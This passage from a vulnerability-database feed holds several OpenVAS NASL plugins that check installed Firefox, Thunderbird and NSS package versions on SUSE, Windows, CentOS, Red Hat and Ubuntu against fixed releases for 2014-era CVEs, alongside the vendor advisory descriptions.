SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850870\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-10-16 13:16:35 +0200 (Fri, 16 Oct 2015)\");\n script_cve_id(\"CVE-2014-1569\", \"CVE-2014-8634\", \"CVE-2014-8635\", \"CVE-2014-8638\", \"CVE-2014-8639\", \"CVE-2014-8641\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for MozillaFirefox (SUSE-SU-2015:0076-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'MozillaFirefox'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update fixes the following security issues in MozillaFirefox:\n\n - MFSA 2015-01/CVE-2014-8634/CVE-2014-8635 (bmo#1109889, bmo#1111737,\n bmo#1026774, bmo#1027300, bmo#1054538, bmo#1067473, bmo#1070962,\n bmo#1072130, bmo#1072871, bmo#1098583) Miscellaneous memory safety\n hazards (rv:35.0 / rv:31.4)\n\n - MFSA 2015-03/CVE-2014-8638 (bmo#1080987) sendBeacon requests lack an\n Origin header\n\n - MFSA 2015-04/CVE-2014-8639 (bmo#1095859) Cookie injection through Proxy\n Authenticate responses\n\n - MFSA 2015-06/CVE-2014-8641 (bmo#1108455) Read-after-free in WebRTC\n\n Also Mozilla NSS was updated to 3.17.3 to fix:\n\n * The QuickDER decoder now decodes lengths robustly\n (bmo#1064670/CVE-2014-1569)\n\n * Support for TLS_FALLBACK_SCSV has been added to the ssltap and tstclnt\n utilities\n\n * Changes in CA certificates\");\n\n script_tag(name:\"affected\", value:\"MozillaFirefox on SUSE Linux Enterprise Server 12, SUSE Linux Enterprise Desktop 12\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"SUSE-SU\", value:\"2015:0076-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(SLED12\\.0SP0|SLES12\\.0SP0)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLED12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"MozillaFirefox\", rpm:\"MozillaFirefox~31.4.0esr~20.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaFirefox-debuginfo\", rpm:\"MozillaFirefox-debuginfo~31.4.0esr~20.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaFirefox-debugsource\", rpm:\"MozillaFirefox-debugsource~31.4.0esr~20.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaFirefox-translations\", rpm:\"MozillaFirefox-translations~31.4.0esr~20.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libfreebl3\", rpm:\"libfreebl3~3.17.3~16.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libfreebl3-32bit\", rpm:\"libfreebl3-32bit~3.17.3~16.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libfreebl3-debuginfo\", rpm:\"libfreebl3-debuginfo~3.17.3~16.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libfreebl3-debuginfo-32bit\", rpm:\"libfreebl3-debuginfo-32bit~3.17.3~16.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsoftokn3\", rpm:\"libsoftokn3~3.17.3~16.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsoftokn3-32bit\", rpm:\"libsoftokn3-32bit~3.17.3~16.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsoftokn3-debuginfo\", rpm:\"libsoftokn3-debuginfo~3.17.3~16.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsoftokn3-debuginfo-32bit\", rpm:\"libsoftokn3-debuginfo-32bit~3.17.3~16.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-nss\", rpm:\"mozilla-nss~3.17.3~16.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-nss-32bit\", rpm:\"mozilla-nss-32bit~3.17.3~16.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-nss-certs\", rpm:\"mozilla-nss-certs~3.17.3~16.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-nss-certs-32bit\", rpm:\"mozilla-nss-certs-32bit~3.17.3~16.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-nss-certs-debuginfo\", rpm:\"mozilla-nss-certs-debuginfo~3.17.3~16.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-nss-certs-debuginfo-32bit\", rpm:\"mozilla-nss-certs-debuginfo-32bit~3.17.3~16.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-nss-debuginfo\", rpm:\"mozilla-nss-debuginfo~3.17.3~16.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-nss-debuginfo-32bit\", rpm:\"mozilla-nss-debuginfo-32bit~3.17.3~16.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-nss-debugsource\", rpm:\"mozilla-nss-debugsource~3.17.3~16.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-nss-tools\", rpm:\"mozilla-nss-tools~3.17.3~16.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-nss-tools-debuginfo\", rpm:\"mozilla-nss-tools-debuginfo~3.17.3~16.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"SLES12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"MozillaFirefox\", rpm:\"MozillaFirefox~31.4.0esr~20.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaFirefox-debuginfo\", rpm:\"MozillaFirefox-debuginfo~31.4.0esr~20.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaFirefox-debugsource\", rpm:\"MozillaFirefox-debugsource~31.4.0esr~20.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaFirefox-translations\", rpm:\"MozillaFirefox-translations~31.4.0esr~20.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libfreebl3\", rpm:\"libfreebl3~3.17.3~16.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libfreebl3-debuginfo\", rpm:\"libfreebl3-debuginfo~3.17.3~16.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libfreebl3-hmac\", rpm:\"libfreebl3-hmac~3.17.3~16.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsoftokn3\", rpm:\"libsoftokn3~3.17.3~16.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsoftokn3-debuginfo\", rpm:\"libsoftokn3-debuginfo~3.17.3~16.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsoftokn3-hmac\", rpm:\"libsoftokn3-hmac~3.17.3~16.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-nss\", rpm:\"mozilla-nss~3.17.3~16.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-nss-certs\", rpm:\"mozilla-nss-certs~3.17.3~16.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-nss-certs-debuginfo\", rpm:\"mozilla-nss-certs-debuginfo~3.17.3~16.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-nss-debuginfo\", rpm:\"mozilla-nss-debuginfo~3.17.3~16.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-nss-debugsource\", rpm:\"mozilla-nss-debugsource~3.17.3~16.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-nss-tools\", rpm:\"mozilla-nss-tools~3.17.3~16.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-nss-tools-debuginfo\", rpm:\"mozilla-nss-tools-debuginfo~3.17.3~16.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libfreebl3-32bit\", rpm:\"libfreebl3-32bit~3.17.3~16.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libfreebl3-debuginfo-32bit\", rpm:\"libfreebl3-debuginfo-32bit~3.17.3~16.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libfreebl3-hmac-32bit\", rpm:\"libfreebl3-hmac-32bit~3.17.3~16.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsoftokn3-32bit\", rpm:\"libsoftokn3-32bit~3.17.3~16.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsoftokn3-debuginfo-32bit\", rpm:\"libsoftokn3-debuginfo-32bit~3.17.3~16.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsoftokn3-hmac-32bit\", rpm:\"libsoftokn3-hmac-32bit~3.17.3~16.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-nss-32bit\", rpm:\"mozilla-nss-32bit~3.17.3~16.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-nss-certs-32bit\", rpm:\"mozilla-nss-certs-32bit~3.17.3~16.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-nss-certs-debuginfo-32bit\", rpm:\"mozilla-nss-certs-debuginfo-32bit~3.17.3~16.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-nss-debuginfo-32bit\", rpm:\"mozilla-nss-debuginfo-32bit~3.17.3~16.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:22", "description": "This host is installed with Mozilla\n Thunderbird and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2015-01-20T00:00:00", "type": "openvas", "title": "Mozilla Thunderbird Multiple Vulnerabilities-01 Jan15 (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-8634", "CVE-2014-8639", "CVE-2014-8638"], "modified": "2018-10-19T00:00:00", "id": "OPENVAS:1361412562310805252", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805252", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_mozilla_thunderbird_mult_vuln01_jan15_win.nasl 11975 2018-10-19 06:54:12Z cfischer $\n#\n# Mozilla Thunderbird Multiple Vulnerabilities-01 Jan15 (Windows)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:mozilla:thunderbird\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805252\");\n script_version(\"$Revision: 11975 $\");\n script_cve_id(\"CVE-2014-8639\", \"CVE-2014-8638\", \"CVE-2014-8634\");\n script_bugtraq_id(72046, 72047, 72049);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-19 08:54:12 +0200 (Fri, 19 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-01-20 13:57:45 +0530 (Tue, 20 Jan 2015)\");\n script_name(\"Mozilla Thunderbird Multiple Vulnerabilities-01 Jan15 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Mozilla\n Thunderbird and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - An error when handling a '407 Proxy Authentication' response with a\n 'Set-Cookie' header from a web proxy.\n\n - Some unspecified errors.\n\n - An error when handling a request from 'navigator.sendBeacon' API interface\n function.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to bypass certain security restrictions, and compromise a user's\n system.\");\n\n script_tag(name:\"affected\", value:\"Mozilla Thunderbird before version 31.4\n on Windows\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Mozilla Thunderbird version\n 31.4 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/62253\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-04\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-03\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-01\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_thunderbird_detect_portable_win.nasl\");\n script_mandatory_keys(\"Thunderbird/Win/Ver\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/thunderbird\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!tbVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:tbVer, test_version:\"31.4\"))\n{\n fix = \"31.4\";\n report = 'Installed version: ' + tbVer + '\\n' +\n 'Fixed version: ' + fix + '\\n';\n security_message(data:report );\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:32", "description": "Check the version of thunderbird", "cvss3": {}, "published": "2015-01-23T00:00:00", "type": "openvas", "title": "CentOS Update for thunderbird CESA-2015:0047 centos6", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-8634", "CVE-2014-8639", "CVE-2014-8638"], "modified": "2019-03-08T00:00:00", "id": "OPENVAS:1361412562310882092", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882092", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for thunderbird CESA-2015:0047 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882092\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-01-23 12:56:25 +0100 (Fri, 23 Jan 2015)\");\n script_cve_id(\"CVE-2014-8634\", \"CVE-2014-8638\", \"CVE-2014-8639\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"CentOS Update for thunderbird CESA-2015:0047 centos6\");\n script_tag(name:\"summary\", value:\"Check the version of thunderbird\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Mozilla Thunderbird is a standalone mail and newsgroup client.\n\nTwo flaws were found in the processing of malformed web content. A web page\ncontaining malicious content could cause Firefox to crash or, potentially,\nexecute arbitrary code with the privileges of the user running Firefox.\n(CVE-2014-8634, CVE-2014-8639)\n\nIt was found that the Beacon interface implementation in Thunderbird did\nnot follow the Cross-Origin Resource Sharing (CORS) specification. A web\npage containing malicious content could allow a remote attacker to conduct\na Cross-Site Request Forgery (XSRF) attack. (CVE-2014-8638)\n\nNote: All of the above issues cannot be exploited by a specially crafted\nHTML mail message as JavaScript is disabled by default for mail messages.\nThey could be exploited another way in Thunderbird, for example, when\nviewing the full remote content of an RSS feed.\n\nRed Hat would like to thank the Mozilla project for reporting these issues.\nUpstream acknowledges Christian Holler, Patrick McManus, Muneaki Nishimura,\nand Xiaofeng Zheng as the original reporters of these issues.\n\nFor technical details regarding these flaws, refer to the Mozilla security\nadvisories for Thunderbird 31.4.0. You can find a link to the Mozilla\nadvisories in the References section of this erratum.\n\nAll Thunderbird users should upgrade to this updated package, which\ncontains Thunderbird version 31.4.0, which corrects these issues.\nAfter installing the update, Thunderbird must be restarted for the changes\nto take effect.\");\n script_tag(name:\"affected\", value:\"thunderbird on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_xref(name:\"CESA\", value:\"2015:0047\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2015-January/020872.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"thunderbird\", rpm:\"thunderbird~31.4.0~1.el6.centos\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:00", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-01-23T00:00:00", "type": "openvas", "title": "RedHat Update for thunderbird RHSA-2015:0047-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-8634", "CVE-2014-8639", "CVE-2014-8638"], "modified": "2018-11-23T00:00:00", "id": "OPENVAS:1361412562310871299", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871299", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for thunderbird RHSA-2015:0047-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871299\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-01-23 12:55:19 +0100 (Fri, 23 Jan 2015)\");\n script_cve_id(\"CVE-2014-8634\", \"CVE-2014-8638\", \"CVE-2014-8639\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"RedHat Update for thunderbird RHSA-2015:0047-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'thunderbird'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Mozilla Thunderbird is a standalone mail and newsgroup client.\n\nTwo flaws were found in the processing of malformed web content. A web page\ncontaining malicious content could cause Firefox to crash or, potentially,\nexecute arbitrary code with the privileges of the user running Firefox.\n(CVE-2014-8634, CVE-2014-8639)\n\nIt was found that the Beacon interface implementation in Thunderbird did\nnot follow the Cross-Origin Resource Sharing (CORS) specification. A web\npage containing malicious content could allow a remote attacker to conduct\na Cross-Site Request Forgery (XSRF) attack. (CVE-2014-8638)\n\nNote: All of the above issues cannot be exploited by a specially crafted\nHTML mail message as JavaScript is disabled by default for mail messages.\nThey could be exploited another way in Thunderbird, for example, when\nviewing the full remote content of an RSS feed.\n\nRed Hat would like to thank the Mozilla project for reporting these issues.\nUpstream acknowledges Christian Holler, Patrick McManus, Muneaki Nishimura,\nand Xiaofeng Zheng as the original reporters of these issues.\n\nFor technical details regarding these flaws, refer to the Mozilla security\nadvisories for Thunderbird 31.4.0. You can find a link to the Mozilla\nadvisories in the References section of this erratum.\n\nAll Thunderbird users should upgrade to this updated package, which\ncontains Thunderbird version 31.4.0, which corrects these issues.\nAfter installing the update, Thunderbird must be restarted for the changes\nto take effect.\");\n script_tag(name:\"affected\", value:\"thunderbird on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"RHSA\", value:\"2015:0047-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2015-January/msg00017.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_6\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"thunderbird\", rpm:\"thunderbird~31.4.0~1.el6_6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"thunderbird-debuginfo\", rpm:\"thunderbird-debuginfo~31.4.0~1.el6_6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:56", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-01-23T00:00:00", "type": "openvas", "title": "Ubuntu Update for thunderbird USN-2460-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-8634", "CVE-2014-8639", "CVE-2014-8638"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310842050", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842050", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for thunderbird USN-2460-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842050\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-01-23 12:58:10 +0100 (Fri, 23 Jan 2015)\");\n script_cve_id(\"CVE-2014-8634\", \"CVE-2014-8638\", \"CVE-2014-8639\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Ubuntu Update for thunderbird USN-2460-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'thunderbird'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Christian Holler and Patrick McManus 